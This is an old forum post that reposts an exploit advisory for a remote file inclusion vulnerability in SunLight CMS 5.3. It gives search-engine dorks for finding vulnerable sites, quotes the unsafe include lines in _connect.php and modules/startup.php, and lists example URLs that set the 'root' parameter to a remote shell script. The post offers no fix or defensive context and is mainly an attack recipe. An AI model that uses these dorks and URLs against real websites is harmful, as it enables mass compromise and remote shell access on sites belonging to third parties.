Ras Posted May 19, 2007 Report Posted May 19, 2007 ###############################################################################################SunLight CMS 5.3 <= Remote File Inclusion Vulnerability##Dork:""cms SunLight 5.2"##Dork2:http://search.seznam.cz/searchScreen?w="cms+SunLight+5.2"&mod=f##Vuln Code################################################################################################ERROR1:_connect.php## /*-----vlozeni pristupovych dat-----*/# include($root."_access.php"); <<< RFI CODE###BUG1:##Example1:[url]http://site.com/path/_connect.php?root=[/url][[Sh3LL Script]]##ERROR2:modules/startup.php## include($root."_connect.php");# include($root."modules/sessions.php");# include($root."modules/content_preload.php"); <<< RFI CODE###BUG1:##Example1:[url]http://site.com/path/modules/startup.php?root=[/url][[Sh3LL Script]]##Script Download################################################################################################[url]http://sunlight.profitux.cz/upload/stahuj/system/sunlight_53_standard.zip[/url]#################################################################################################Cyber-Security############################################################################################### Quote
